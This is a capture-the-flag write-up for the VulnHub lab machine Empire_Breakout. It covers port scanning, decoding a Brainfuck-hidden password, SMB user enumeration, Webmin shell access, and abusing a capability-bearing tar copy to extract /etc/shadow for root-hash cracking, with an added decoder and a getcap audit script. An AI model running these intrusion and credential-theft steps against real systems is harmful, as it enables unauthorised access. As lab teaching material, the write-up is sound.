Empire_Breakout is a lightweight VulnHub machine that mixes web enumeration, Git leakage, weak encoding, and Linux capabilities for privilege escalation. The foothold is obtained by discovering an encoded password inside the Apache default page and validating users via SMB enumeration. Privilege escalation is achieved through misconfigured Linux capabilities that allow reading sensitive files.
Target: 10.10.10.8
Initial vector: encoded password in Apache page → Webmin console
Privilege escalation: Linux capabilities → read protected files
$ sudo nmap -p- --open -sS --min-rate=5000 -n -Pn -vvv 10.10.10.8 -oG Ports.txt
$ sudo nmap -p80,139,445,10000,20000 -sCV 10.10.10.8 -oN Services.txt
Key findings:
The default Apache “It works” page contains a string written in **Brainfuck**, a common CTF trick: the string is a Brainfuck program, and running it prints a password.
The decoded password comes without a username. To identify the user, enumerate SMB:
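To show how the password is recovered from the page, here is a minimal Brainfuck interpreter, added as an example and not part of the original write-up. It ignores characters outside the eight Brainfuck operations, but note that HTML around the program (for instance `<!-- -->`) contains valid operations of its own, so copy the program itself out of the page rather than the whole markup. The sample program below is constructed and prints "Hi", not the machine's actual password.

```python
# Minimal Brainfuck interpreter (added example, not the author's tooling).
# It executes a program and returns what the program prints, which is how
# the "encoded" password on the Apache page is recovered.

BF_OPS = set("<>+-.,[]")


def _match_brackets(code):
    """Precompute jump targets for [ and ]; reject unbalanced programs."""
    stack, jumps = [], {}
    for i, op in enumerate(code):
        if op == "[":
            stack.append(i)
        elif op == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return jumps


def bf_decode(source, stdin=b"", max_steps=1_000_000):
    """Execute Brainfuck `source` and return its output as text.

    Characters outside the eight Brainfuck ops are ignored (whitespace and
    plain comments are fine; strip surrounding HTML first). Cells are 8-bit
    and wrap, the tape grows to the right on demand, and `max_steps` bounds
    execution so a non-terminating program cannot hang the caller.
    """
    code = [c for c in source if c in BF_OPS]
    jumps = _match_brackets(code)
    tape = bytearray(1)
    ptr = pc = steps = 0
    inp = list(stdin)
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; program may not terminate")
        op = code[pc]
        if op == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)
        elif op == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved left of cell 0")
            ptr -= 1
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = inp.pop(0) if inp else 0
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]  # skip the loop body
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]  # back to the matching '['
        pc += 1
    return out.decode("latin-1")


# Constructed sample program (not the machine's real string): prints "Hi".
SAMPLE_PROGRAM = """
++++++++[>+++++++++<-]>.
<++++[>++++++++<-]>+.
"""

if __name__ == "__main__":
    print(bf_decode(SAMPLE_PROGRAM))
```

Paste the string from the page into `SAMPLE_PROGRAM` and run the script; the step limit and bracket check mean a garbled copy fails loudly instead of spinning forever.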
$ enum4linux 10.10.10.8 | tee output_enum4linux.txt
With the username and decoded password, log into Webmin:
https://10.10.10.8:20000/
Webmin provides a built‑in shell:
https://10.10.10.8:20000/shell
This gives direct command execution on the host.
Enumerate capabilities:
$ getcap -r / 2>/dev/null
A copy of tar in the home directory of a low-privileged user (/home/cyber/tar) carries an extended capability that lets it read arbitrary files, including /etc/shadow and the contents of /root.
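Before treating every getcap hit as a finding, it helps to triage the listing. The following audit script is an added example, not the author's tooling: it parses both getcap output formats (older libcap prints `path = caps+flags`, newer releases print `path caps=flags`), flags capabilities that bypass file-permission or identity checks, and flags binaries outside distro-managed directories, where a capability-bearing copy of a system tool is almost never legitimate. The sample listing is constructed, and the dangerous-capability set and directory list are choices of this example.

```python
# Audit of `getcap -r / 2>/dev/null` output (added example, not the
# author's tooling). Flags capabilities that defeat file permissions or
# identity checks, and binaries living outside distro-managed directories.
import re

# Capabilities that on their own defeat file permission or identity checks
# (selection made for this example).
DANGEROUS_CAPS = {
    "cap_dac_read_search",  # bypass read/search permission checks on files
    "cap_dac_override",     # bypass read/write/execute permission checks
    "cap_chown", "cap_fowner", "cap_setuid", "cap_setgid",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_sys_rawio",
}

# Where packaged, capability-bearing binaries (ping, etc.) normally live.
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
               "/usr/lib/", "/usr/libexec/")

# Older libcap: "path = caps+flags"; newer libcap (2.41+): "path caps=flags".
LINE_RE = re.compile(r"^(\S+)\s+(?:=\s*)?(\S.*)$")


def parse_getcap_line(line):
    """Return (path, set of capability names) or None for unparseable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    path, spec = m.groups()
    names = set()
    # A spec may hold several clauses, each "cap_a,cap_b" followed by =/+/- flags.
    for clause in spec.split():
        head = re.split(r"[=+-]", clause, maxsplit=1)[0]
        names.update(n.strip().lower() for n in head.split(",") if n.strip())
    return path, names


def audit_getcap(text):
    """Turn getcap output into a list of findings, sorted by path."""
    findings = []
    for line in text.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        risky = sorted(caps & DANGEROUS_CAPS)
        foreign = not path.startswith(SYSTEM_DIRS)
        if not risky and not foreign:
            continue
        reasons = []
        if risky:
            reasons.append("grants " + ",".join(risky))
        if foreign:
            reasons.append("outside distro-managed directories")
        severity = "high" if (risky and foreign) else "medium" if risky else "low"
        findings.append({"path": path, "caps": caps,
                         "severity": severity, "reasons": reasons})
    return sorted(findings, key=lambda f: f["path"])


# Constructed sample listing in the style of this machine; /home/cyber/tar
# is the entry the write-up exploits, the others are ordinary or made up.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/home/cyber/tar cap_dac_read_search=ep
/opt/tools/nc cap_net_bind_service,cap_setuid+eip
"""

if __name__ == "__main__":
    for f in audit_getcap(SAMPLE_GETCAP):
        print(f"[{f['severity']}] {f['path']}: {'; '.join(f['reasons'])}")
```

On the sample, ping and gnome-keyring-daemon produce no finding (ordinary capabilities in system directories), while the tar copy in /home/cyber and the nc in /opt are both rated high. Running this against the real `getcap -r /` output is a quick way to spot the one entry that matters among the packaged ones.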
Example exploitation:
$ cd /etc
$ /home/cyber/tar -czf /tmp/shadow.tar.gz shadow
$ cd /tmp
$ /home/cyber/tar -xzf shadow.tar.gz
Once /etc/shadow has been extracted, the copy in /tmp is readable by the current user: crack the root hash from it, or use the same approach to read other protected files directly.
This leads to full root compromise.
Empire_Breakout is a short but interesting machine: a Brainfuck‑encoded password hidden in the Apache page, SMB enumeration to identify users, Webmin shell access, and a misconfigured capability‑enabled binary that allows reading protected files. A clean demonstration of how small misconfigurations can escalate into full system compromise.